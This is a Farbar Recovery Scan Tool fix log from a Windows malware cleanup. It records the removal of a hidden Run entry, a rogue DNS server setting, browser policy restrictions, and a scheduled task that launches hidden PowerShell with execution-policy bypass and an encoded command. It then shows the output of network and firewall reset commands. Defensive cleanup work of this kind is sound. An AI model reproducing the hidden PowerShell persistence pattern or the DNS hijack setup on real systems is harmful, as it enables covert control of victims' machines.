Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by archer (2016-01-01 13:27:27) Run:1
Running from C:\Users\archer\Desktop
Loaded Profiles: archer (Available Profiles: archer & joseph.fernandez)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\Run: [grint] => C:\ProgramData\grint.exe [15127440 2015-08-31] ()
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Tcpip\Parameters: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}: [NameServer] 95.211.158.130
2015-12-28 19:41 - 2015-12-28 19:41 - 00019370 _____ C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1e0eec9d-6064-0}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1966dac7-1064-1}
2014-12-28 17:10 - 2015-01-06 17:51 - 0001014 _____ () C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2015-09-20 19:04 - 2015-09-20 19:04 - 2696318 _____ () C:\ProgramData\8X4gFnnipSHGg.exe
2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe
Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand
Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION
Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers
*****************

Restore point was successfully created.
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\Software\Microsoft\Windows\CurrentVersion\Run\\grint => value removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google" => key removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}\\NameServer => value removed successfully
C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => moved successfully
C:\ProgramData\{1e0eec9d-6064-0} => moved successfully
C:\ProgramData\{1966dac7-1064-1} => moved successfully
C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat => moved successfully
C:\ProgramData\8X4gFnnipSHGg.exe => moved successfully
C:\ProgramData\grint.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EF83657C-EF9E-4218-82A9-05747B10DB28}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF83657C-EF9E-4218-82A9-05747B10DB28}" => key removed successfully
C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{491A6DCB-2E1E-ACCF-813E-678E06910CAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B}" => key removed successfully
C:\windows\System32\Tasks\VoiceBook => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\VoiceBook" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3959C21C-7347-4BD6-9B0B-E53839FFF249}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3959C21C-7347-4BD6-9B0B-E53839FFF249}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Superclean => key not found.
C:\windows\Tasks\VoiceBook.job => moved successfully
c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107} => moved successfully

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully

========= End of RemoveProxy: =========

========= netsh advfirewall reset =========

Ok.

========= End of CMD: =========

========= netsh advfirewall set allprofiles state ON =========

Ok.

========= End of CMD: =========

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

========= netsh winsock reset catalog =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

========= netsh int ip reset c:\resetlog.txt =========

Resetting Global, OK!
Resetting Interface, OK!
Resetting Unicast Address, OK!
Resetting Neighbor, OK!
Resetting Path, OK!
Resetting , failed.
Access is denied.
Resetting , OK!
Restart the computer to complete this action.

========= End of CMD: =========

========= ipconfig /release =========

Windows IP Configuration

No operation can be performed on Local Area Connection* 3 while it has its media disconnected.
No operation can be performed on Ethernet while it has its media disconnected.

Wireless LAN adapter Local Area Connection* 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . :

Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix . :
   IPv6 Address. . . . . . . . . . . : fd00:fc:8dad:d352:3121:75ac:30ff:9cbc
   Temporary IPv6 Address. . . . . . : fd00:fc:8dad:d352:3909:526a:67e6:df17
   Link-local IPv6 Address . . . . . : fe80::3121:75ac:30ff:9cbc%5
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . : hitronhub.home

Tunnel adapter isatap.hitronhub.home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . :

========= End of CMD: =========

========= ipconfig /renew =========

Windows IP Configuration

No operation can be performed on Local Area Connection* 3 while it has its media disconnected.
No operation can be performed on Ethernet while it has its media disconnected.

Wireless LAN adapter Local Area Connection* 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . :

Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix . : hitronhub.home
   IPv6 Address. . . . . . . . . . . : fd00:fc:8dad:d352:3121:75ac:30ff:9cbc
   Temporary IPv6 Address. . . . . . : fd00:fc:8dad:d352:3909:526a:67e6:df17
   Link-local IPv6 Address . . . . . : fe80::3121:75ac:30ff:9cbc%5
   IPv4 Address. . . . . . . . . . . : 192.168.0.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1

Ethernet adapter Ethernet:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . : hitronhub.home

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . :

Tunnel adapter isatap.hitronhub.home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . : hitronhub.home

========= End of CMD: =========

========= netsh int ipv4 reset =========

Resetting Interface, OK!
Resetting , failed.
Access is denied.
Restart the computer to complete this action.

========= End of CMD: =========

========= netsh int ipv6 reset =========

Resetting Interface, OK!
Resetting Neighbor, OK!
Resetting Path, OK!
Resetting , failed.
Access is denied.
Resetting , OK!
Resetting , OK!
Restart the computer to complete this action.

========= End of CMD: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

{54A3DED1-E35B-47F0-8CCA-93C636ECC4B0} canceled.
{F7F23026-8237-4287-9C85-4EA2BA3F078F} canceled.
{F8167E7E-CA14-4E78-93A9-062EC9E86678} canceled.
{F77EF983-F016-40DE-93FC-607F3EDC282E} canceled.
4 out of 4 jobs canceled.

========= End of CMD: =========

EmptyTemp: => 14.5 GB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 13:29:15 ====